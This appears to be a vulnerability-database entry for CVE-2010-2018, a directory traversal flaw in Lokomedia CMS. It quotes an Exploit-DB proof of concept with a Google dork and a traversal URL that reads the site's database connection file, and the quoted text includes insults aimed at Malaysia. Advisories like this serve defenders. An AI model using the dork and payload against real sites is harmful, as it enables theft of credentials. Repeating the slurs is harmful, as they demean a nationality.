CVE-2010-2018

medium
Published 2010-05-24 ยท Modified 2026-04-29
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
6.0

Description

Directory traversal vulnerability in downlot.php in Lokomedia CMS 1.4.1 and 2.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-12651 webapps php verified text ยท 1 KB
vir0e5 ยท 2010-05-18

Lokomedia CMS - 'sukaCMS' Local File Disclosure

text exploit Source: Exploit-DB
# Software Link: http://bukulokomedia.com
# Version: [2.0]
# Tested on: [all OS]

[+] Title : Local File Disclosure Vulnerability Lokomedia CMS (sukaCMS)

[+] Vendor     : http://bukulokomedia.com

[+] Discovered : vir0e5 a.k.a banditc0de

[+] Contact    : vir0e5[at]hackermail[dot]com

[+] Site       : http://vir0e5.blogspot.com

[+] DorK       : inurl:/downlot.php?file=
 
[+] Exploit    : http://[host]/[dir]/downlot.php?file=../config/koneksi.php

[+] Greetings  :[ mywisdom - kiddies - kamtiez - r3m1ck - Aoc - skuteng_boy  - blue_screen - 
                  agdi_cool - dangercode14045 - dewancc and YOU!!!! ] ;

[+] Forum [as member] : http://indonesian-cyber.org | http://tecon-crew.org | http://u3dcrew.darkbb.com | http://devilzc0de.org

[+] Notice : "boycott malaysian product "
* Fuck to Malaysia <= the truly thief asia  
* For HaMaDa SCoOoRPioN are you layz????? copy my exploit???
  http://securityreason.com/securityalert/7161  
  http://securityreason.com/exploitalert/7413   Look Date!!! your copy my style!!! 



      

Application impact

VendorProductVersionsFixed
bukulokomedialokomedia_cms1.4.1
bukulokomedialokomedia_cms2.0

References

CWEs

CWE-22

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.